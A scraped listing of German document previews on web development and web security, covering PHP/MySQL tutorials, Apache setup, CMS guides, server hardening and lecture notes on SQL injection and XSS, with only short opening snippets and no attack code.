Dynamische Webanwendungen Dynamische Webanwendungen Mohamed Said Seminar Moderne Informatik Universität Dortmund SS 2003 Mohamed Said / 2003-05-30 1 Überblick Einleitung (Konzept) Client-seitiges Skripting mit JavaScript CGI Server-seitiges

Mehr

Frage: Ich möchte meinen Microsoft Windows Server gegen Hacker absichern, was kann ich sinnvolles tun?

Frage: Ich möchte meinen Microsoft Windows Server gegen Hacker absichern, was kann ich sinnvolles tun? Windows Server absichern Frage: Ich möchte meinen Microsoft Windows Server gegen Hacker absichern, was kann ich sinnvolles tun? Antwort: 1. Abschalten / Deinstallation unbenötiger Dienste Gerade Plesk

Mehr

PHP Übungsaufgabe 3 1 / 5. Doing Web Apps. PHP Übungsaufgabe 3

PHP Übungsaufgabe 3 1 / 5. Doing Web Apps. PHP Übungsaufgabe 3 1 / 5 Doing Web Apps PHP Übungsaufgabe 3 Werkzeuge Text-Editor, beispielsweise Notepad++ Webserver mit aktiviertem PHP Modul + MySQL-Datenbank Unterlagen Ziele SelfHTML PHP API Handbuch Alle Dokumente

Mehr

Hostsharing eg providing Open Source

Hostsharing eg providing Open Source Hostsharing eg providing Open Source Ein genossenschaftliches Webhosting-Konzept im professionellen Einsatz ein Vortrag von Babette Wagner und Christian H. Horchert Wie alles begann September 1999: Gründung

Mehr

7.11.2006. int ConcatBuffers(char *buf1, char *buf2, size_t len1, size_t len2) {

7.11.2006. int ConcatBuffers(char *buf1, char *buf2, size_t len1, size_t len2) { Universität Mannheim Lehrstuhl für Praktische Informatik 1 Prof. Dr. Felix C. Freiling Dipl.-Inform. Martin Mink Dipl.-Inform. Thorsten Holz Vorlesung Angewandte IT-Sicherheit Herbstsemester 2006 Übung

Mehr

verstehen lernen, wie der Angreifer denkt diese Methoden selbst anwenden Allerdings: Mitdenken, nicht nur blindes ausprobieren Außerdem:

verstehen lernen, wie der Angreifer denkt diese Methoden selbst anwenden Allerdings: Mitdenken, nicht nur blindes ausprobieren Außerdem: !! "!!##$ %& es gibt keine 100 %ige Sicherheit Fehler zu machen ist menschlich man muss es so gut wie möglich machen es ist GROB FAHRLÄSSIG es nicht einmal zu versuchen Ziel: Methoden entwickeln, die Sicherheit

Mehr

Installation/Update und Konfiguration des Renderservice (v1.7.0)

Installation/Update und Konfiguration des Renderservice (v1.7.0) Installation/Update und Konfiguration des Renderservice (v1.7.0) [edu- sharing Team] [Dieses Dokument beschreibt die Installation und Konfiguration des Renderservice.] edu- sharing / metaventis GmbH Postfach

Mehr

Apache. O'REILLY Beijing Cambridge Farnham Köln Paris Sebastopol Taipei Tokyo. Das umfassende Handbuch. Ben Laurie und Peter Laurie 2.

Apache. O'REILLY Beijing Cambridge Farnham Köln Paris Sebastopol Taipei Tokyo. Das umfassende Handbuch. Ben Laurie und Peter Laurie 2. 2.AUFLAGE Apache Das umfassende Handbuch Ben Laurie und Peter Laurie Deutsche Übersetzung von Peter Klicman, Jochen Wiedmann & Jörgen W. Lang O'REILLY Beijing Cambridge Farnham Köln Paris Sebastopol Taipei

Mehr

FileMaker und PHP Workshop

FileMaker und PHP Workshop FileMaker und PHP Workshop 2-stündiger Ausschnitt aus einem 3-tägigen Schulungsprogramm Bernhard Schulz FileMaker Konferenz 2010 / Zürich Ziel des Workshops Kennenlernen von PHP Möglichkeiten von FileMaker

Mehr

PhPepperShop Newsletter Modul

PhPepperShop Newsletter Modul PhPepperShop Newsletter Modul Datum: 18. März 2015 Version: 4.0 PhPepperShop Newsletter Modul Anleitung Glarotech GmbH Inhaltsverzeichnis 1. Einleitung...3 2. Installation...3 2.1 Systemanforderungen...3

Mehr

Thema: SQL-Injection (SQL-Einschleusung):

Thema: SQL-Injection (SQL-Einschleusung): Thema: SQL-Injection (SQL-Einschleusung): Allgemein: SQL (Structured Query Language) ist eine Datenbanksprache zur Definition von Datenstrukturen in Datenbanken sowie zum Bearbeiten (Einfügen, Verändern,

Mehr

Collax Web Application

Collax Web Application Collax Web Application Howto In diesem Howto wird die Einrichtung des Collax Moduls Web Application auf einem Collax Platform Server anhand der LAMP Anwendung Joomla beschrieben. LAMP steht als Akronym

Mehr

DIMDI SmartSearch. MySmartSearch. Einrichtung eines individuellen Direkteinstiegs. Ausgabe 1.3 vom 14. Januar 2015. Waisenhausgasse 36-38a 50676 Köln

DIMDI SmartSearch. MySmartSearch. Einrichtung eines individuellen Direkteinstiegs. Ausgabe 1.3 vom 14. Januar 2015. Waisenhausgasse 36-38a 50676 Köln DIMDI SmartSearch MySmartSearch Einrichtung eines individuellen Direkteinstiegs Waisenhausgasse 36-38a 50676 Köln Telefon: +49 221 4724-1 Fax: +49 221 4724-444 www.dimdi.de Helpdesk Technik E-Mail: helpdesk@dimdi.de

Mehr

SQL. SQL = Structured Query Language, ist eine standardisierte Sprache zum Gebrauch im Zusammenhang mit Datenbanken.

SQL. SQL = Structured Query Language, ist eine standardisierte Sprache zum Gebrauch im Zusammenhang mit Datenbanken. Vorlesungsteil SQL Grundlagen - 1 / 8 - SQL SQL = Structured Query Language, ist eine standardisierte Sprache zum Gebrauch im Zusammenhang mit Datenbanken. Auf einem Server (Rechner im Netz, der Dienste

Mehr

Ablauf. Wichtige Termine. Vertiefendes Übungsprojekt - SQL II

Ablauf. Wichtige Termine. Vertiefendes Übungsprojekt - SQL II Ablauf Wichtige Termine Ablauf der Lehrveranstaltung Vorstellung des Projektthemas Projektgruppen Vorstellung der Arbeitsumgebung (Software, Locations) Walkthrough Datenbankentwurf Formulare PHP Security

Mehr

Verteidigung gegen SQL Injection Attacks

Verteidigung gegen SQL Injection Attacks Verteidigung gegen SQL Injection Attacks Semesterarbeit SS 2003 Daniel Lutz danlutz@watz.ch 1 Inhalt Motivation Demo-Applikation Beispiele von Attacken Massnahmen zur Verteidigung Schlussfolgerungen 2

Mehr

Gesamtbeispiel zu PHP/PostgreSQL

Gesamtbeispiel zu PHP/PostgreSQL Gesamtbeispiel zu PHP/PostgreSQL 1. Beispiel: Gegeben ist folgende Tabelle wh=# select * from person2; vorname nachname ort hobby ---------+----------+------+---------- hans huber wien laufen hans schubert

Mehr

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus?

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

PHP und MySQL. Integration von MySQL in PHP. Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424. Michael Kluge (michael.kluge@tu-dresden.

PHP und MySQL. Integration von MySQL in PHP. Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424. Michael Kluge (michael.kluge@tu-dresden. Zentrum für Informationsdienste und Hochleistungsrechnen (ZIH) PHP und MySQL Integration von MySQL in PHP Zellescher Weg 12 Willers-Bau A109 Tel. +49 351-463 - 32424 (michael.kluge@tu-dresden.de) MySQL

Mehr

Grundlagen der EDV 3. Vorlesung mit Übungen. Dipl. Ing. Martin Ney

Grundlagen der EDV 3. Vorlesung mit Übungen. Dipl. Ing. Martin Ney Grundlagen der EDV 3 Vorlesung mit Übungen Dipl. Ing. Martin Ney Grundlagen der EDV 3 HTML und CSS HTML und PHP CMS Datenbanken SQL Grundlagen der EDV 2/29 Internetprotokolle HTTP zum Abruf von Internetdateien

Mehr

Kundenbereich HANDBUCH

Kundenbereich HANDBUCH www.flatbooster.com Kundenbereich HANDBUCH deutsche Auflage Datum: 03.12.2011 Version: 1.0.3 Download: http://flatbooster.com/support Inhaltsverzeichnis 1 Kunden Verwaltung 1 1.1 News & Meldungen.................................

Mehr

4 Aufruf des Servers, Kommandozeilen-Optionen

4 Aufruf des Servers, Kommandozeilen-Optionen 4 Aufruf des Servers, Kommandozeilen-Optionen 4.1 Einführung In diesem Abschnitt lernen Sie verschiedene Methoden zum Start des Apache-Servers, einige der wichtigsten Kommandozeilen-Optionen und Methoden

Mehr

Herzlich Willkommen. Der Weg zur eigenen Homepage. vorgestellt von Frank Kullmann

Herzlich Willkommen. Der Weg zur eigenen Homepage. vorgestellt von Frank Kullmann Herzlich Willkommen Der Weg zur eigenen Homepage vorgestellt von Frank Kullmann 1. Die Planung Was soll auf unserer Homepage abgebildet werden (Texte, Bilder, Videos usw.)? Welche Struktur soll unsere

Mehr

Hilfe! Die Homepage zieht um! Uwe Stache

Hilfe! Die Homepage zieht um! Uwe Stache Hilfe! Die Homepage zieht um! Uwe Stache Es passt... Ihr Business Unser Beitrag was zusammen gehört! Medien Wirtschaftskompetenz Bewährte Technik Neue Gedanken Wir bauen WebSites... und machen, dass man

Mehr

Datenbank-basierte Webserver

Datenbank-basierte Webserver Datenbank-basierte Webserver Datenbank-Funktion steht im Vordergrund Web-Schnittstelle für Eingabe, Wartung oder Ausgabe von Daten Datenbank läuft im Hintergrund und liefert Daten für bestimmte Seiten

Mehr

MySql und PHP. Apache2: Konfigurieren für php4. ...\apache2\conf\httpd.conf aufrufen. Folgende Zeilen einfügen:

MySql und PHP. Apache2: Konfigurieren für php4. ...\apache2\conf\httpd.conf aufrufen. Folgende Zeilen einfügen: MySql und PHP Apache2: Konfigurieren für php4...\apache2\conf\httpd.conf aufrufen Folgende Zeilen einfügen: LoadModule php4_module "c:/php/php4apache2.dll" AddType application/x-httpd-php.php Wichtig!!

Mehr

Joomla!-Sicherheit. von Joomla-Security.de. Jan Erik Zassenhaus & Christian Schmidt. www.joomla-security.de. Seite 1

Joomla!-Sicherheit. von Joomla-Security.de. Jan Erik Zassenhaus & Christian Schmidt. www.joomla-security.de. Seite 1 Joomla!-Sicherheit von Joomla-Security.de Jan Erik Zassenhaus & Christian Schmidt Seite 1 Wollen Sie sowas? Seite 2 PC Passwörter Allgemeines Anti-Viren-Software Firewall Updates des Systems und von der

Mehr

Einführung in Web-Security

Einführung in Web-Security Einführung in Web-Security Alexander»alech«Klink Gulaschprogrammiernacht 2013 Agenda Cross-Site-Scripting (XSS) Authentifizierung und Sessions Cross-Site-Request-Forgery ([XC]SRF) SQL-Injections Autorisierungsprobleme

Mehr

SQL-Injection in the news Stand: 17.06.2006 24:00

SQL-Injection in the news Stand: 17.06.2006 24:00 Vernetzte Unternehmen I SQL-Injection Prof. Dr. H. Strack, Dipl.-Inf.(FH) Ch. Karich SQL-Injection in the news Stand: 17.06.2006 24:00 Heise-Newsticker: 02.06.06: SQL-Injection-Lücke in MySQL gestopft

Mehr

Ist meine Website noch sicher?

Ist meine Website noch sicher? Ist meine Website noch sicher? Massive Angriffe gegen Joomla, Wordpress,Typo3 Stephan Sachweh Geschäftsführer Pallas GmbH Pallas GmbH Hermülheimer Straße 8a 50321 Brühl information (at) pallas.de http://www.pallas.de

Mehr

CGI-Programmierung. Fachhochschule Wiesbaden Fachbereich Design-Informatik-Medien Prof. Dr. Weber 15. Dezember 2008

CGI-Programmierung. Fachhochschule Wiesbaden Fachbereich Design-Informatik-Medien Prof. Dr. Weber 15. Dezember 2008 CGI-Programmierung Fachhochschule Wiesbaden Fachbereich Design-Informatik-Medien Prof. Dr. Weber 15. Dezember 2008 Alexander Petitjean - Alexander.Petitjean@YMail.com Yelena Kolpakova - Yelena.K@gmx.de

Mehr

Sicherheit von Webapplikationen aus technischer Sicht

Sicherheit von Webapplikationen aus technischer Sicht Sicherheit von Webapplikationen aus technischer Sicht Security-Breakfast, Brühl, 14.09.2012 Tim Kretschmann Senior System Engineer Pallas GmbH Hermülheimer Straße 8a 50321 Brühl information(at)pallas.de

Mehr

Web Visu Tutorial. Hipecs Web Visu. Übersicht

Web Visu Tutorial. Hipecs Web Visu. Übersicht Revision Date V100 10082011 Hipecs Web Visu Die hipecs (high performance controller system) bietet die Möglichkeit einer sog Web-Visualisierung über den integrierten Webserver Hierfür wird im Standard

Mehr

Hochschule Darmstadt Fachbereich Informatik

Hochschule Darmstadt Fachbereich Informatik Hochschule Darmstadt Fachbereich Informatik Entwicklung webbasierter Anwendungen Tipps und Tricks zur Software Installation 1 Vorbemerkung Auf den Laborrechnern ist natürlich alles installiert! Die Installation

Mehr

Dynamik bis zur DB-Interaktion. Marc Schanne. CGI Möglichkeiten

Dynamik bis zur DB-Interaktion. Marc Schanne. CGI Möglichkeiten CGI einfach PHP Dynamik bis zur DB-Interaktion 1 CGI Möglichkeiten Das Common Gateway Interface (CGI) ermöglicht den Entwurf von interaktiven, benutzergesteuerten Web-Applikationen. Der WWW-Server ruft

Mehr

Open Source. Thomas Weibel, Multi & Media thomas.weibel@bluewin.ch www.thomasweibel.ch

Open Source. Thomas Weibel, Multi & Media thomas.weibel@bluewin.ch www.thomasweibel.ch Open Source Thomas Weibel, Multi & Media thomas.weibel@bluewin.ch www.thomasweibel.ch Inhalt 1. Begriff, Lizenzen 2. HTML 5, Nachschlagewerke 3. Software 4. Linux: Ubuntu 5. Content-Management-Systeme

Mehr

Dynamische Webseiten

Dynamische Webseiten Dynamische Webseiten Seminar Medientechnik 30.06.2003 Dynamische Webseiten 1 Inhalt Allgemeine Funktionsweise eines Webservers Grundgedanke von dynamischen Webseiten Einschub: Dynamische Seitenerzeugung

Mehr

Anleitung zur Aktualisierung

Anleitung zur Aktualisierung CONTREXX AKTUALISIERUNG 2010 COMVATION AG. Alle Rechte vorbehalten. Diese Dokumentation ist urheberrechtlich geschützt. Alle Rechte, auch die der Modifikation, der Übersetzung, des Nachdrucks und der Vervielfältigung,

Mehr

Was ist neu in TYPO3 6.0

Was ist neu in TYPO3 6.0 Was ist neu in TYPO3 6.0 Wer steht denn da vorne? Wolfgang Wagner Jahrgang 1972 lebt in Friedrichshafen dabei seit TYPO3 3.8 ein paar Jahre nebenberuflich als Webdesigner unterwegs seit Dezember 2012 bei

Mehr

Ein kleines Tutorial zu 1 st News, dem New sletter- Skript von Stephan Altmann

Ein kleines Tutorial zu 1 st News, dem New sletter- Skript von Stephan Altmann Ein kleines Tutorial zu 1 st News, dem New sletter- Skript von Stephan Altmann 1 Einführung 2 Voraussetzungen 3 I nstallation allgemein 4 I nstallation als Plugin für AT Contenator 5 Funktionalitäten 6

Mehr

Welche Gefahren gehen vom Firmenauftritt im Internet aus?

Welche Gefahren gehen vom Firmenauftritt im Internet aus? Die Webseite als Eintrittspunkt Welche Gefahren gehen vom Firmenauftritt im Internet aus? Bekannt gewordene Schwachstellen & Angriffe Bekannt gewordene Schwachstellen & Angriffe Quelle: http://www.vulnerability-db.com/dev/index.php/2014/02/06/german-telekom-bug-bounty-3x-remote-vulnerabilities/

Mehr

»Fast alles lässt sich aus einem Modulordner heraus

»Fast alles lässt sich aus einem Modulordner heraus Typolight für Entwickler Leicht zu erweitern Ein großer Vorteil von Typolight ist, dass die Erweiterbarkeit des Systems von Anfang an bedacht und entsprechend umgesetzt wurde. Von Leo Feyer Info Auf einen

Mehr

09.06.2003 André Maurer andre@maurer.name www.andre.maurer.name Wirtschaftsinformatik FH 3.5 Fachhochschule Solothurn, Olten

09.06.2003 André Maurer andre@maurer.name www.andre.maurer.name Wirtschaftsinformatik FH 3.5 Fachhochschule Solothurn, Olten Aktuelle Themen der Wirtschaftsinformatik Zusammenfassung 09.06.2003 André Maurer andre@maurer.name www.andre.maurer.name Wirtschaftsinformatik FH 3.5 Fachhochschule Solothurn, Olten 1 Serverseitige Webprogrammierung

Mehr

Lösungen der Aufgaben zur Klausurvorbereitung. Aufgabe 1: a) was sagen die folgenden Eigenschaften eines XML-Dokumentes aus? wohlgeformt gültig

Lösungen der Aufgaben zur Klausurvorbereitung. Aufgabe 1: a) was sagen die folgenden Eigenschaften eines XML-Dokumentes aus? wohlgeformt gültig HTW Dresden Fakultät Informatik/Mathematik Internettechnologien Lösungen der Aufgaben zur Klausurvorbereitung Aufgabe 1: a) was sagen die folgenden Eigenschaften eines XML-Dokumentes aus? wohlgeformt gültig

Mehr

Vergleich von CM-Systemen. präsentiert von Tim Hoffmann und Niels Reinhard

Vergleich von CM-Systemen. präsentiert von Tim Hoffmann und Niels Reinhard Vergleich von CM-Systemen präsentiert von Tim Hoffmann und Niels Reinhard Gliederung Auswahl der CM-Systeme Vergleich nach Kategorien Vergleich der ausgewählten CMS Drei Fallbeispiele Auswahl der CM-Systeme

Mehr

Multisite Setup. mit Nutzung von Subversion. Drupal Voice Chat 21.10.2008 mcgo@drupalist.de

Multisite Setup. mit Nutzung von Subversion. Drupal Voice Chat 21.10.2008 mcgo@drupalist.de Multisite Setup mit Nutzung von Subversion Drupal Voice Chat 21.10.2008 mcgo@drupalist.de 1 Voraussetzungen Server (dediziert oder virtuell) Zugriff auf Terminal (z.b. per ssh) Webserver / Datenbankserver

Mehr

Herzlich Willkommen! eine praxisnahe Übersicht. Mit Java ins Web - mb@bebox.franken.de. 26.11.2000 (c) Michael Behrendt -

Herzlich Willkommen! eine praxisnahe Übersicht. Mit Java ins Web - mb@bebox.franken.de. 26.11.2000 (c) Michael Behrendt - Herzlich Willkommen! Mit Java ins Web - eine praxisnahe Übersicht 1 Wer bin ich? Michael Behrendt, 21, Nürnberg kurzer Lebenslauf: 1991 Erster Rechner: Commodore C128 1995 Ausbildung zum Datenverarbeitungskaufmann

Mehr

BS-Anzeigen 3. Handbuch für das Zusatzmodul modazs Import von Anzeigen aus der Anzeigenschleuder

BS-Anzeigen 3. Handbuch für das Zusatzmodul modazs Import von Anzeigen aus der Anzeigenschleuder BS-Anzeigen 3 Handbuch für das Zusatzmodul modazs Import von Anzeigen aus der Anzeigenschleuder Inhaltsverzeichnis Anwendungsbereich... 3 Betroffene Softwareversion... 3 Anzeigenschleuder.com... 3 Anmeldung...

Mehr

MySQL Performance Tuning für Entwickler

MySQL Performance Tuning für Entwickler MySQL Performance Tuning für Entwickler Cebit 2015, Hannover Oli Sennhauser Senior MySQL Consultant, FromDual GmbH oli.sennhauser@fromdual.com 1 / 18 FromDual GmbH Support Beratung remote-dba Schulung

Mehr

TimeMachine. Installation und Konfiguration. Version 1.4. Stand 21.11.2013. Dokument: install.odt. Berger EDV Service Tulbeckstr.

TimeMachine. Installation und Konfiguration. Version 1.4. Stand 21.11.2013. Dokument: install.odt. Berger EDV Service Tulbeckstr. Installation und Konfiguration Version 1.4 Stand 21.11.2013 TimeMachine Dokument: install.odt Berger EDV Service Tulbeckstr. 33 80339 München Fon +49 89 13945642 Mail rb@bergertime.de Versionsangaben Autor

Mehr

Angreifbarkeit von Webapplikationen

Angreifbarkeit von Webapplikationen Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre

Mehr

Dokumentation Shopsystem

Dokumentation Shopsystem E-Commerce Solutions Frame Based Shops Anhang zur Dokumentation Shopsystem Version 1.0 Stand: Februar 2013 Technischer Support - KNV Serviceline Tel.: 0711 7860-1000 Fax: 0711 7860-2820 E-Mail: internethotline@knv.de

Mehr